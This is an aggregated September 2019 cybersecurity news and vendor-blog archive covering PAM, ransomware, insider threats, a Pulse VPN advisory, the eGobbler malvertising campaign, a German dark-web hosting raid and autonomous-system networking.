Monthly Archives: September 2019

Managing and monitoring privileged access to cloud ecosystems

Cloud data breaches are on the rise, demonstrating time and again the need for a different approach and strategy when it comes to managing and monitoring privileged access to cloud ecosystems. Privilege access management (PAM) should: Be risk-aware and intelligent Reduce sprawl of infrastructure, accounts, access and credentials Use continuous identity analytics. Just-in-time management of privileged accounts According to Gartner’s 2018 Magic Quadrant for PAM report, by 2022 more than 50% of organizations with PAM … More

The post Managing and monitoring privileged access to cloud ecosystems appeared first on Help Net Security.

Five questions every CEO should be asking about cybersecurity

Estimated reading time: 3 minutes

As the captain of the ship, the Chief Executive Officer (CEO) plays a very important role in how an enterprise addresses cybersecurity issues and concerns. When the CEO provides a buy-in towards making enterprise security safer, it trickles down as a new mindset for the entire organization.

The 9th Annual Cost of Cybercrime Study 2019 revealed a significant statistic – the average cost of cybercrime for an organization increased by $1.4 million to $13 million in 2019.

More than anything else, this is the most important statistic which illustrates why cybersecurity is one of the most important issues that a modern organization must deal with. It is no longer a question of IT or Information Security – it is a business issue as important as anything else which leaders need to deal with urgently.

But to create that mindset, what kind of questions should a CEO be asking? Here are five important ones:

  1. How prepared is the enterprise right now to handle cyber risks?

The CEO, as the most important leader in the company, must know and that too, in minute detail, about his company’s preparedness to current threats. The leadership must have detailed visibility of how the enterprise is dealing with these risks, what measures they are taking and also, what threats are slipping through the net. This question is the first starting point for the CEO and the answer to this question will provide a complete understanding of where the enterprise is currently placed when it comes to cybersecurity. On the basis of that, plans for the future can be made.

  1. Does the senior leadership buy into the current cybersecurity framework? If not, why?

CEOs head organizations but they can never be a one-person army. Great organizations surround CEOs with a team of competent leaders who come together to form one unified front. It is in the same way that a company’s senior leadership team comprising the C-suite must also showcase a united stand towards cybersecurity measures taken by the enterprise. This helps in better compliance and inculcation of a security-first mindset among employees. However, this is easier said than done and that is why a CEO must ask this question.

If the CEO finds out that this is not the case, the first step is to get the entire leadership team on board.

  1. What is our plan for responding to cybersecurity incidents? How regularly has it been tested?

Cybersecurity is not a zero-sum game – there is always a scope for malware to sneak through despite the best possible measures. This is why an Incident Response Plan comes in handy as it details the actions to be taken for different kind of incidents. The CEO must be aware of every intricate detail of this plan as in times of a crisis, they will need to show that they are in control. CEOs must also keep themselves abreast of how regularly this plan is tested so that they are aware of any shortcomings in it.

  1. Do the employees have a cybersecurity mindset?

Employees are the single biggest factor in cybersecurity preparedness for an enterprise. The CEO must be aware of the current culture of cybersecurity in the organization – are employees aware of the dangers that cyber threats may pose or do they still remain blissfully unaware? If the answer is the latter, the CEO must immediately put in place a plan to create a mindset of cybersecurity in the entire organization.

  1. How does the enterprise handle insider threats?

Cybersecurity is not always an external affair – in many cases, danger lurks within the enterprise in the form of insider threats and disgruntled employees. It is not just the InfoSec team that has to be aware of this  – the CEO must ask leading questions about this dangerous type of threat and the kind of the measures the company is taking to tackle this threat.

Creating a cybersecurity culture in an enterprise is not easy but investing in a strong enterprise solution goes a long way in protecting an organization from the varied threats that exist. Seqrite’s range of solutions enables security and greater productivity in the cybersecurity journey.  

The post Five questions every CEO should be asking about cybersecurity appeared first on Seqrite Blog.

38% of the Fortune 500 do not have a CISO

To uncover whether the world’s leading companies are committed to enhancing their cybersecurity initiatives, Bitglass researched the members of the 2019 Fortune 500 and analyzed public-facing information such as what is available on their websites. 77% of the Fortune 500 make no indication on their websites about who is responsible for their security strategy. Additionally, 52% do not have any language on their websites about how they protect the data of customers and partners (beyond … More

The post 38% of the Fortune 500 do not have a CISO appeared first on Help Net Security.

Email is an open door for malicious actors looking to exploit businesses

There’s an alarming scale of risks businesses are up against in a time when email is proving an open door for cybercriminals and malicious actors looking to disrupt, exploit and destroy businesses, according to Wire. The report is developed in collaboration with global poker champion and astrophysicist, Liv Boeree. P​oker is a game of making calculated, strategic decisions in high-stakes situations. As such, Liv is able to draw parallels between the poker table and the … More

The post Email is an open door for malicious actors looking to exploit businesses appeared first on Help Net Security.

Employee negligence can be a leading contributor to data breaches

Two thirds (68%) of businesses reported their organization has experienced at least one data breach in the past 12 months, and nearly three in four (69%) of those data breaches involved the loss or theft of paper documents or electronic devices containing sensitive information, according to the Shred-it report conducted by the Ponemon Institute. According to the report, typical workplace occurrences may be at the root of the problem as 65% of managers are concerned … More

The post Employee negligence can be a leading contributor to data breaches appeared first on Help Net Security.

Tolly report: Evaluating the evolution of network traffic analysis technology

Network Traffic Analysis has been rapidly evolving to counter the increased sophistication of threats experienced by organizations worldwide. Test methodologies and tools are not yet available which provide security professionals with the ability to test how well the products currently on the market perform. Awake Security has partnered with the Tolly Group and a current Darktrace customer to develop and execute just such a test and has published a report detailing the methodology and the … More

The post Tolly report: Evaluating the evolution of network traffic analysis technology appeared first on Help Net Security.

Anomali Altitude automates detection, analysis, and threat response

Anomali, a leader in intelligence-driven cybersecurity solutions, unveiled the Anomali Altitude platform. The Anomali Altitude platform delivers Anomali Lens, Anomali ThreatStream, and Anomali Match. The integrated product suite allows customers to automate detection, analysis, and response for high-priority external and internal threats. Anomali Lens This first-of-its-kind technology allows anyone, from security operations staff to board members, to automatically and immediately know if their organizations are being attacked, who adversaries are, and if the attacks have … More

The post Anomali Altitude automates detection, analysis, and threat response appeared first on Help Net Security.

Cyber Threats to Medical Imaging Systems and How to Address Them

Healthcare continues to see staggering growth in breaches to patient health information. In the first half of 2019 alone, 32 million health records were breached, compared to 15 million records in the entire year of 2018. However, this trend of growing cyber breaches in healthcare is likely to persist due to the following characteristics of […]… Read More

The post Cyber Threats to Medical Imaging Systems and How to Address Them appeared first on The State of Security.

2019-129: File Disclosure Vulnerability in Pulse Connect Secure VPN Software

Overview The Australian Signals Directorate’s Australian Cyber Security Centre is aware of a vulnerability that exists in the Pulse Connect Secure Virtual Private Network (VPN) solution. We advise users to ensure their systems are patched and up to date. The Pulse VPN Vulnerability, also known as CVE-2019-11510, was initially disclosed in April 2019 but has resurfaced after multiple reports of exploitation and the disclosure of working exploits available for use on Pastebin and GitHub.

BlackBerry creates BlackBerry Advanced Technology Development Labs

BlackBerry announced the creation of BlackBerry Advanced Technology Development Labs (BlackBerry Labs), a new business unit operating at the forefront of research and development in the cybersecurity space. Led by CTO Charles Eagan, BlackBerry Labs will include a team of over 120 software developers, architects, researchers, product leads and security experts, each working toward the common goal of identifying, exploring and creating new technologies to ensure BlackBerry is on the cutting edge of security innovation. … More

The post BlackBerry creates BlackBerry Advanced Technology Development Labs appeared first on Help Net Security.

Red Hat shares rising interest for hybrid cloud in APAC

Red Hat, the world’s leading provider of open source solutions, shared that there is a rising interest for hybrid cloud in Asia Pacific (APAC), evident from the increasing number of cloud and managed services providers joining the Red Hat Certified Cloud and Service Providers program in Australia, China, India, Japan, Korea, Singapore, Thailand, The Philippines and Vietnam. The Red Hat Certified Cloud and Service Provider program includes more than 300 cloud, system integrator and managed … More

The post Red Hat shares rising interest for hybrid cloud in APAC appeared first on Help Net Security.

Loop1 Systems expands to the UK with the acquisition of Kenson

Loop1 Systems, an Austin-based enterprise IT service organization, proudly announces the acquisition of Kenson, one of the U.K.’s most respected suppliers of network management tools, expertise, and support. Kenson has served the market for more than 15 years and in 2017, the company received the SolarWinds Channel Renewal Partner of the Year Award. “The [Loop1] commitment to SolarWinds is steadfast and evident in the 10-year track record they have with SolarWinds,” said John Woolford, COO … More

The post Loop1 Systems expands to the UK with the acquisition of Kenson appeared first on Help Net Security.

Kenna Security raises $48M to accelerate its international expansion and drive further innovation

Kenna Security, the enterprise leader in risk-based vulnerability management, announced a $48 million series D funding round that adds Sorenson Capital and Citi Ventures as new investors. Ken Elefant, Managing Director of Sorenson Capital will join Kenna Security’s board of directors. The investment brings Kenna’s total raised to $98 million. “This round of funding demonstrates significant confidence in Kenna’s continued growth potential as the global market for risk-based vulnerability management expands,” said Karim Toubba, CEO … More

The post Kenna Security raises $48M to accelerate its international expansion and drive further innovation appeared first on Help Net Security.

Monitoring Application Security with SIEM

Undefined

It always seems like the clichéd image of a security expert is them sitting in a dark room with upwards of four to six bright monitors displaying different complex tasks. Regardless of how many monitors they use, we know security teams are using just as many, if not more, complex tools. According to analyst firm EMA’s Security Megatrend Report, 75% of respondents use more than six consoles to do their jobs. While the stereotypical cybersecurity expert at work may seem thrilling, the reality is that having so many tools to monitor can be overwhelming and virtually impossible.

Security Information and Event Management (SIEM) solutions provide security staff relief and insights with a centralized analysis of security data pulled from a variety of systems. Read on to learn about the large variety of information a SIEM can consolidate, becoming your organization’s primary security monitoring tool.

Typical Information

Universally, SIEMs monitor standard datasources, which include operating systems like Windows and Linux, routers and switches, firewalls, databases, and servers. SIEMs monitor these assets not only for unusual behavior, but can also ensure that planned activities, like addition or deletion of users or data, occurred without incident. Having all of these sources monitored in one place also allows for event correlation. Event correlation shows how a single event can be related to other logged events, assisting in forensic analysis and providing an audit trail. This can provide powerful insights about your environment.  For example, if a user engages in unusual behavior on your server, you can bring up all activity from that user, capturing security events more quickly and seeing if there is a pattern on other devices, warranting suspicion.

Diverse Datastreams

While standard datasources are critical to monitor, each organization brings unique sources to the table that also need monitoring, like a homegrown database or third-party applications. Connecting things like a CRM streamlines your environment even further, reducing the number of consoles your security team has to look at.

This is particularly important for things like financial applications, in which capturing events real-time can be especially crucial. For example, if a credentialed user was created, performed several actions, and was then deleted, this suspicious behavior can mean that both confidential data and money could be at risk. Without a SIEM monitoring events and sending an alert in real time, this activity may not be spotted until it’s too late to do anything about it. Additionally, if an unauthorized user attempts or is able to download confidential data, a SIEM can immediately disable that user’s access, preventing any further risk while the event is investigated. Types of action taken depend on the event and can be configured to suit the needs of each organization.

Most importantly, enabling application security can bring further insight into event relationships. The more a SIEM monitors, the easier it is to find correlating events, providing a new angle from which to view your security picture. For example, integrating an antivirus solution can allow you to not only get alerts about thwarted breaches, it can also allow you to isolate where the infection attempt originated, providing further insight.

Expanding the SIEM Network

A SIEM is only as good as the data streams it can assess. As mentioned above, while there are typical sources that most environments have, many organizations have needs outside of the normal scope. Simply put, a SIEM can’t generate alerts for an application it isn’t monitoring. Instead, a data source not filtered by a SIEM will require special attention, increasing not only your security team’s workload, but also the likelihood of suspicious activity slipping through the cracks. The more sources you connect, the more insights you can gain. 

Powertech Event Manager provides a holistic view of your entire environment. It not only provides out-of-the-box-templates for easy implementation for standard datasources, it can also be used with in-house applications, third party software or connected devices, providing a full audit trail and real-time monitoring for non-mainstream applications that still provide access to your critical systems. Our experts will be readily available to work with your security team to develop a plan for connecting any necessary data streams and provide ongoing support.

siem-ptx-blogheader-1020x394.jpg

Vulnerability Management
Big text: 
Blog
Resource type: 
Blogs
Are you ready to reduce the risk of insider threats in your organization?

Get a live demo of our cybersecurity solutions from one of our solution experts today.

What Tesla’s Cryptojack Attack Means for the Rest of Us

Undefined

In February, Fortune, Wired, and other media outlets reported that hackers worked their way into automaker Tesla’s Amazon Web Services (AWS®) cloud account to mine for cryptocurrency. These so-called “cryptojacking” attacks are on the rise in concert with escalating cryptocurrency prices, prompting hackers to gain access to company networks to generate these virtual forms of tender. It’s yet another facet of cybersecurity to keep IT experts up at night, wondering who will be hit next.

Cryptocurrency…What Is That Again?

As a refresher, a cryptocurrency is a digital or virtual currency secured through cryptography, which makes it hard to counterfeit. Bitcoin is probably the most well-known example. Cryptocurrencies are decentralized, can be used anonymously in transactions, and aren’t subject to government regulation. Because of this lack of oversight, they are perfect for illegal activities such as tax evasion and money laundering. Cryptocurrencies make use of blockchain, a secure, online ledger technology for recording and verifying transactions in a permanent way.  

From Bad to Worse

Fortunately for Tesla, researchers from cybersecurity firm RedLock discovered the intrusion. However, the attack itself was possible because Tesla’s credentials were available on an unsecured IT administrative console—with no password protection. Said another way, Tesla forgot to lock the door. In addition to mining for cryptocurrency, the attackers were able to access other sensitive information such as vehicle servicing and mapping data. The researchers couldn’t determine how long the hackers had access to Tesla’s account, or the amount of cryptocurrency they were able to mine, but they found evidence that the cryptocurrency software Stratum had been used.

An Ounce of Prevention

Tesla acted quickly to secure its files, but the fact that this intrusion happened at all is a major red flag. Although cybersecurity threats are everywhere, and ingenious hackers seem to think up new ways to get into sensitive information every day, this is one of those cases where it was all too easy to commit a crime. Why? Because the information was essentially sitting out there for anyone to find and use for their own purposes.

Avoiding this type of scenario takes a proactive approach to your IT infrastructure. Powertech Security Auditor automatic cloud system discovery and auditing would have found additional AWS systems as they were deployed. In addition, Tesla administrators would have received alerts of those findings, thwarting this or any similar type of attack. The solution works by automatically applying security controls on the systems it discovers. It reports on any audits that fail to meet corporate standards. Incorrect configurations, unapproved users, and any non-approved running services would have been reported.

In concert with Security Auditor, Powertech Event Manager provides centralized logging and auditing of security alerts and events within IT environments. By normalizing the various data streams and prioritizing the criticality of security events, you can quickly and clearly identify security incidents and take appropriate action to resolve the issues and secure your environment.

cybersecurity-generic-blog-lock-on-laptop-1920x744_1.gif

Vulnerability Management
Big text: 
Blog
Resource type: 
Blogs
Is your organization protected against ransomware?

Watch our on-demand webinar to discover steps to reduce your risk.

Ransomware Hits the City of Atlanta

Undefined

On March 22, the city of Atlanta was brought to its knees by a ransomware attack. CNN reported that the malicious incident affected at least five of the city’s municipal departments, effectively locking down key functions for the police, courts, and more. The attackers asked for the $51,000 ransom to be paid in the bitcoin cryptocurrency. According to the Atlanta Journal-Constitution, the city had declined to say whether it had made this payment as of April 12, and the overall estimated cost of the breach was at $2.7 million and climbing.

Not If, But When

In coverage of the incident, news sources indicated the city had known for years of its security vulnerabilities and lack of a solid approach to business continuity and disaster recovery planning. The reality of these concerns is now upon municipal employees and citizens as everyone struggles to complete everyday tasks without computer access. The fact that Atlanta had just begun to address the recommendations from its January cybersecurity audit is especially heartbreaking.

What Happened Behind the Scenes

The vulnerabilities in the city’s infrastructure were no match for the SamSam ransomware, which tag teams with tools such as Mimikatz to detect weak passwords and take control of networks. In this way, SamSam can move throughout a network quickly without the need to propagate via employee’s email accounts, as occurs in some ransomware schemes. SamSam also interfaces with tools including JexBoss to find unpatched servers running Red Hat® JBoss® solutions. Once inside these locations, the hackers can implement scripts that cull credentials and other information. Finally, the ransomware encrypts files, and the hackers demand their payment.

It Could Have Been Prevented

Disruptive and costly ransomware attacks like what the city of Atlanta is experiencing are all too common. No doubt the cybersecurity issues the city was in the process of addressing would have included solutions such as those HelpSystems customers rely on every day.

Powertech Antivirus runs natively on Red Hat and other major Linux distributions to detect and clean ransomware and malware like SamSam and Mimikatz. HelpSystems risk assessment engagements do a full patch audit on your Linux systems and identify any missing updates which can leave your organization vulnerable to attack.

Powertech Security Auditor has a feature for automatically detecting unapproved system services. The solution discovers unwanted programs running in your environment and immediately terminates them, limiting the chance of damage and data leaks.

Powertech Event Manager provides centralized logging and auditing of the security alerts and events within your environment. By normalizing the various data streams and prioritizing the criticality of security events, you can quickly and clearly identify security incidents and take the appropriate steps to secure your environment and resolve the issue.

cybersecurity-generic-article-malware-alert-900x412_3.gif

Identity and Access Management
Big text: 
Blog
Resource type: 
Blogs
Try Powertech Event Manager for Free

Avoid a ransomware attack with our one-size-fits-all SIEM solution

Cryptoviral Extortion: The Enduring Problem of Ransomware

Undefined

In 1989, the first instance of ransomware was delivered to thousands of people on floppy disks and demanded that money be sent in the form of a cashier’s check or international money order to a P.O. box in Panama. These days, ransomware has become increasingly more streamlined. Just about anyone can purchase a ransomware strain off the dark web and deploy it without needing to be all that tech savvy. Additionally, using cryptocurrency like Bitcoin helps attackers stay anonymous and untraceable. Though modern ransomware is simple to use, its effects can be far reaching and long lasting. Read on to learn about the long arms of ransomware, and how to protect your organization from its grasp.

Ransomware can set you back decades

Attackers have found a particularly vulnerable victim in small towns and businesses, which often lack the financial resources it takes to recover from a ransomware attack. For example, the Alaskan borough of Matanuska-Susitna nearly had to shut down after a strain swept through their systems, affecting everyone from the purchasing department to the library. Those assets that were not infected were taken offline to prevent further spread. Staff were forced to return to the use of pen, paper, and typewriters for days. Though the attack took place in July 2018, the borough is still recovering.

While successful ransomware attacks don’t always completely cripple organizations, they almost always cause significant disruption. For example, last year’s attack on the city of Atlanta using the SamSam strain of ransomware cost millions, and also took months to get productivity back to normal levels.

Unfortunately, organizations remain far too overconfident in their ability to recover quickly. In a comprehensive survey of cybersecurity professionals conducted by Cybersecurity Insiders, 79% of respondents thought they could recover from an attack in less than a week. Though initial information about attacks is constantly in the news, more follow ups to demonstrate the long-lasting effects may still be needed.

Data backup plans may not be enough

Ransomware can be fast acting and incredibly thorough, as Apex Human Capital Management just discovered. Recently, a ransomware attack spread through their network. However, they had just completed an exhaustive recovery plan with an off-site system that mirrored their live system intended to protect them from exactly this type of situation. Regrettably, since the live-site had an ongoing connection to the backup site, the ransomware was quickly able to hold both sets of data hostage.

Sadly, the path to the retrieval of their data was not a smooth one. They paid the ransom but were given a decryption key that did not work as promised. The decryption process broke a number of directories and made some of the other files completely unopenable. In the end, they were left with a half recovered set of files.

In order to have a truly secure backup, it’s important to have a secondary system that is disconnected from the network when it isn’t backing up data. In fact, it’s best to have multiple backups in place, with at least one of them off-site.

Paying the ransom is no guarantee of recovery

Apex’s desire to simply get it over with and pay the ransom to quickly get data back and return to business as usual is an instinct everyone can sympathize with.  Regardless, experts almost universally advise not to pay the ransom. The fact is, you simply cannot trust that attackers will return your data once you’ve paid. Once you’ve paid, they have what they want, and face zero consequences for not holding up their end of the bargain. For example, XBash malware poses as ransomware, but is programmed merely to destroy Linux databases, and contains no restoration mechanism.  

Despite this, according to a survey by CyberEdge Group, 38.7% of organizations paid the ransom, and only half of these victims recovered their data. Of the 61.3% that did not pay the ransom, 53.3% were able to recover some of their data. It’s far better to invest the ransom payment into recovering the data through other means. Ultimately, paying ransom is bad for everyone. You’re unlikely to get your data back and giving into demands only encourages either a repeat attack, or further attacks on other organizations.

Preparedness and prevention

Realistic expectations, multiple backups, informed employees, and a policy to not pay ransoms are all necessary components to being prepared for a ransomware attack. However, the best way to prepare for ransomware attacks is to prevent them from succeeding in the first place.

Security Event Information Management (SIEM) solutions provide centralized logging and auditing of the security alerts and events within your environment. SIEM software can help provide context to events and clearly identify security incidents, like indicators of ransomware, in real-time. This allows security teams to take action to secure your environment to lock down systems before it spreads.

Implementing robust anti-malware with predictive analysis not only catches existing strains of malware, it can also detect new viruses before they become widespread. It’s also important that you don’t only have anti-malware for just workstations, but also provide protection for other endpoints like servers, preventing ransomware from entering elsewhere in your environment.

By taking a proactive approach to ransomware, organizations have a much better chance of never having to recover from it.

ransomware1920x744.png

Vulnerability Management
Big text: 
Blog
Resource type: 
Blogs
Is your organization protected against ransomware?

Watch out on-demand webinar to discover steps to reduce your risk.

eGobbler Malvertiser Bypassed Browser Protections Using Obscure Bugs

A malvertising actor known as “eGobbler” used obscure browser bugs to bypass built-in browser protections and expand the scope of its attacks. Confiant observed eGobbler exploiting the first vulnerability back on April 11, 2019. In that particular attack, the threat actor leveraged a Chrome exploit to circumvent the browser’s pop-up blocker built into iOS devices. […]… Read More

The post eGobbler Malvertiser Bypassed Browser Protections Using Obscure Bugs appeared first on The State of Security.

eGobbler ‘s malvertising campaign hijacked over 1 billion ad impressions

A recently observed a malvertising campaign carried out by a threat group dubbed eGobbler that hijacked roughly 1.16 billion ad impressions.

Researchers at Confiant observed a malvertising campaign carried out by a threat actor dubbed eGobbler hijacked roughly 1.16 billion ad impressions to redirect victims to websites hosting malicious payloads.

The campaign was observed between August 1 and September 23.

The eGobbler group was first observed by security firm Confiant in April when it was exploiting a security flaw in the Google Chrome browser to target millions of iOS users. At the time, Cofiant experts estimated that more than 500 million malicious ads had been served to iOS users.

This time eGobbler hackers extended their attacks to Windows, Linux, and macOS desktop devices.

“Over the past 6 months, the threat group has leveraged obscure browser bugs in order to engineer bypasses for built-in browser mitigations against pop-ups and forced redirections.” reads the analysis published by Confiant.

“This blog post will provide overviews and proof of concepts for both browser exploits. The first exploit that we reported on April 11, 2019 impacts Chrome versions prior to 75 on iOS. The second, which we reported on Aug. 7 was fixed in iOS 13 / Safari 13.0.1 on Sept. 19, impacts WebKit based browsers.”

In recent campaign, attackers used an exploit that targets WebKit based browsers, the researchers observed redirections on WebKit browsers upon the ‘onkeydown’ event.”

“The nature of the bug is that a cross-origin nested iframe is able to “autofocus” which bypasses the “allow-top-navigation-by-user-activation” sandbox directive on the parent frame.” continues the analysis. “With the inner frame automatically focused, the keydown event becomes a user activated navigation event, which renders the ad sandboxing entirely useless as a measure for forced redirect mitigation.”

Experts also discovered that the payload used in this campaign had specifically targeted some web applications using text areas and search forms in order to maximize the chances of hijacking these keypresses.

“eGobbler’s preference for desktop platforms during this period supports their latest WebKit exploit, as the ‘onkeydown’ event is less likely to spawn organically during mobile browsing,” states Confiant.

Experts reported the bug to both the Chrome and Apple security teams, the latter answered within the hour while on August 9 the former responded that they were investigating.

On August 12, the Chrome team provided an update that a patch was submitted to WebKit on August 9:

Apple addressed the issue in iOS 13 on September 19 and in Safari 13.0.1 on September 24.

The analysis published by the experts includes Indicators of Compromise for the recent campaign, including a list of content delivery network (CDNs) used by eGobbler threat actor to delivery the malicious payloads.

Pierluigi Paganini

(SecurityAffairs – eGobbler, hacking)

The post eGobbler ‘s malvertising campaign hijacked over 1 billion ad impressions appeared first on Security Affairs.

Five Malicious Insider Threat Indicators and How to Mitigate the Risk

Undefined

With the prevalence of cyber attacks from individuals and groups looking to exploit corporate vulnerabilities and sensitive information assets, companies sometimes overlook another common threat: their own employees. It’s incredibly disheartening to think of trusted current or former colleagues looking to exploit sensitive information for their own monetary gain, but it’s increasingly common. Luckily, there are some telltale signs of this malicious activity that can enable you to identify and rectify problems as quickly as possible using the strategies detailed.

Indicators: Increasing Insider Threat Awareness

Keep an eye out for the following suspicious occurrences, and you’ll have a far better chance of thwarting a malicious insider threat, even if it’s disguised as an unintentional act.

1. Unusual logins

At many companies there is a distinct pattern to user logins that repeats day after day. Logins happening remotely, from unusual locations, or during odd hours could be a sign of trouble. Likewise, your authentication logs may start filling up with numerous unexplained occurrences of “test” or “admin” username attempts that fail to pass muster. Anything that strikes you as out of the ordinary warrants investigation.

2. Use or repeated attempted use of unauthorized applications

No doubt you maintain a dizzying number of mission-critical systems such as your CRM, financial management applications, ERP, and others, each of which should have a strictly defined set of users. If you’re structuring your access privileges properly, you’ll have particular people or roles that are granted access to necessary applications. When unauthorized people gain access to these applications and the sensitive data they house, it could mean a breach of disastrous proportions for your business. An increase in attempts to log in to these systems could be a red flag.

3. An increase in escalated privileges

Anyone with heightened system access is an inherent threat to your business simply because they are likely privy to sensitive information that should never fall into the wrong hands. Sometimes, a person with administrative rights (a trusted individual) will start granting privileges to others who shouldn’t have them. An increase in the number of people with this sort of escalated access could mean they’re wandering unencumbered around your servers, looking for just the right data to sell on the dark web. These insider threats could also be using these privileges to access unauthorized applications as mentioned above.

4. Excessive downloading of data

Your IT team probably has a good handle on your organization’s bandwidth usage and data downloading patterns when it comes to data accessed from your onsite network or cloud infrastructure and copied onto computers or external drives. Perhaps it’s normal for the sales team to download large marketing files or for HR to save large employee or payroll databases on a regular basis. But if you begin to see significant downloads of data that can’t be explained, or that occur during odd times of the day or from strange locations in which you don’t typically do business, something is likely amiss.

5. Unusual employee behavior

The behavior indicator is a good one, and it requires some intuition and a keen eye. If someone who is normally a high performer who gets along well with others starts to act differently, take notice. While it’s certainly possible there are extenuating personal circumstances behind the scenes, unexplained poor performance or disagreements with coworkers or superiors over policies could mean this person is someone to keep an extra close eye on for the foreseeable future. Particularly if he or she seems to indicate some sort of financial distress or unexplained financial gain—or resigns unexpectedly—they may have or be planning to make improper use of your corporate assets.

Strategizing and Implementing an Insider Threat Program

The strategies and tools available to round out your insider threat program are becoming more sophisticated to keep up with—and often stay ahead of—cybercriminals out for financial gain or to cause destruction.

1. Make sense of event data with a SIEM solution

security information and event management (SIEM) solution can become your eyes and ears by aggregating, normalizing, and interpreting the vast data feeds from your cybersecurity monitoring solutions. This can include changes to user profiles and system values, invalid login attempts, intrusion detections, and changed or deleted objects. It will spot abnormalities beyond the typical ‘noise’ happening within the data and send alerts to indicate issues. This enables your team to assess disturbances and act on them swiftly to minimize the potential impact.

2. Limit user access with a privileged access management (PAM) solution

It is well worth the effort to develop and implement a thorough approach to user privileges and access rights. Most employees only require access to a few key network locations and applications, and even these need to be curated by their role and also as job-specific requirements change. In general, users should only be able to access precisely what’s needed to perform their jobs on a daily basis (keeping in mind their productivity if workaround processes are cumbersome). Doing this effectively requires a privileged access management solution. This helps you assign the lowest level of privileges required to minimize exposure, more commonly known as the principle of least privilege..  

3. Maintain vigilance

Malicious insider threats are an unfortunate reality today, and there’s no substitute for ongoing attention to what’s happening across your network. This means you need to check in on a consistent basis, track unusual behavior, and take comments and complaints about an employee’s unusual behavior seriously. Always remember that in addition to implementing the appropriate cybersecurity tools and procedures to help you keep up with your environment monitoring and bolster your security posture, your intuition is often a guide when something’s wrong.

five-malicious-insider-threat-indicators-and-how-mitigate-risk-blog.png

Vulnerability Management
Big text: 
Blog
Resource type: 
Blogs
Want to learn more about keeping your organization safe?

Discover the latest trends and key challenges surrounding insider threats by downloading the 2019 Insider Threat Report today.

BlackBerry launches BlackBerry Labs to develop cybersecurity solutions

BlackBerry Ltd. is looking to ramp up its cybersecurity research and development by today announcing the launch of a new business unit entitled BlackBerry Advanced Technology Development Labs (BlackBerry Labs).

The unit will be headed by BlackBerry’s chief technology officer, Charles Eagan, and will include a team of over 120 software developers, architects, researchers, product leads and security experts.

“The establishment of BlackBerry Labs is the latest in a series of strategic moves we’ve taken to ensure our customers are protected across all endpoints and verticals in the new IoT,” said Eagan in a press release. “Today’s cybersecurity industry is rapidly advancing and BlackBerry Labs will operate as its own business unit solely focused on innovating and developing the technologies of tomorrow that will be necessary for our sustained competitive success, from A to Z; Artificial Intelligence to Zero-Trust environments. We believe this highly experienced team will allow us to remain nimble, engaged and, above all else, proactive in our efforts to be the most trusted security software leader in the market.”

While the overarching scope will be researching and developing security solutions, BlackBerry said initial work will be specifically focused on machine learning approaches to security in partnership with the company’s existing Cylance, Enterprise, and QNX business units.

Cloudflare’s WAF rule to protect against vBulletin RCE (CVE-2019-16759)

Cloudflare’s WAF rule to protect against vBulletin RCE (CVE-2019-16759) VBulletin RCE (CVE-2019-16759): Cloudflare is a well-known company that offers a wide range of internet services aimed at keeping your website safe. Cloudflare has recently added a new managed rule to its WAF firewall to help protect against vBulletin Remote Code Execution exploit (CVE-2019-16759). RCE (Remote ... Read moreCloudflare’s WAF rule to protect against vBulletin RCE (CVE-2019-16759)

The post Cloudflare’s WAF rule to protect against vBulletin RCE (CVE-2019-16759) appeared first on HackingVision.

German Police Bust Dark Web Hosting Cyber-Bunker Business

German Police Bust Dark Web Hosting Cyber-Bunker Business

Hundreds of servers used to support child pornography, cybercrime, and the sale of illegal drugs have been seized in a police raid on a former NATO bunker in Germany.

German authorities arrested thirteen people between the ages of 20 and 59 on Friday after busting up a dark web hosting operation being run from a heavily fortified five-floor military bunker in the peaceful riverside town of Traben-Trarbach. 

After breaking through an iron door to gain access to the temperature-controlled bunker, 600 police searched the 1.3-acre premises and found around 200 servers stored in stacks together with disks, mobile phones, documents, and a large sum of cash. 

A 59-year-old Dutchman, who purchased the bunker in 2013, is thought to be the owner and operator of the business, which offered secured "bulletproof" website hosting to illegal businesses and concealed their activities from authorities. Sites linked to the bunker include illegal online drug stores Cannabis Road, Orange Chemicals, and Wall Street Market, formerly the second-largest global marketplace for drugs, where users could also buy hacking tools and financial-theft ware.

Suspects arrested in connection with the raid are thought to have links to organized crime and are likely to be named as accessories to over 250,000 offenses involving money counterfeiting, drugs, data mining, forged documents, and the distribution of child pornography.

Seven of the people arrested are being held in custody, with two thought to hold previous convictions for running a similar business out of a former military bunker in the Netherlands, which was sold as CyberBunker. 

Regional criminal police chief Johannes Kunz said, "I think it’s a huge success . . . that we were able at all to get police forces into the bunker complex, which is still secured at the highest military level. We had to overcome not only real, or analog, protections; we also cracked the digital protections of the data center."

Since the operation of the bunker hosting service isn't illegal per se, German authorities must prove the suspects arrested were aware of the illegal behavior of the hosted businesses to secure a conviction. Evaluating the stored data to determine this could take anywhere from months to years. 

Commenting on the raid, Vectra's head of security, Chris Morales, said: "We need to see more collaboration like this which involves the coordination between digital forensics and investigation and physical police enforcement. I applaud all of the German law enforcement agencies involved on a job well done."

How to Explore Autonomous Systems in Business Network and the Way Hackers use it

The’ net’ in’ internet’ is a network. It’s also technically an internet network— a computer network. Are you still confused?

We refer to these independent computer networks as autonomous systems when we talk about routing. A single, independent system routes packets internally, while packets traveling through the internet typically pass through many autonomous systems.

Think of it: Internet routing occurs on independent systems and not on single pcs. Each AS receives its own distinctive 16-digit identity number or ASN, thanks to the Internet Assigned Numbers Authority (IANA).

Smaller networks like your home have much easier network-internet interactions. When you purchase an internet service plan, the ISP provides you with a DSL or one of those old school cable modems which allow you to reach the “total web” on the router, the only thing about the router is that you have your local computers + machines on one side, and you have the whole internet on the other.

So why build Autonomous systems?

This is enough for mere mortals to explain how the internet operates. But if you want to prevent getting bound to a single internet provider or your internet connection is not as great as you need it, you build your own AS if you want to’ expand your possible parameters,’ as they say.

The fact that you have your own AS can be useful to your network in various respects, including:

  • IP address portability
  • Achieving flexible network administration
  • Direct interaction with IXP’s
  • Individual network identity for external and internal purposes
  • Full traffic control
  • Ability to set your BGP with ASN No.

How to build an Autonomous system

It is not that hard to create an autonomous system and only requires a few measures. If you want to develop an independent system, you do this:

Step 1: Found a company–you need to set up an AS by a legal entity, so begin brainstorming on a business name.

Step 2: Get yourself a public address –this might be the toughest step. You must obtain a government IP address block that is sufficiently big to advertise over BGP. Three IPv4 addresses are no longer left, so you must purchase an IPv6 address, which can be quite expensive.

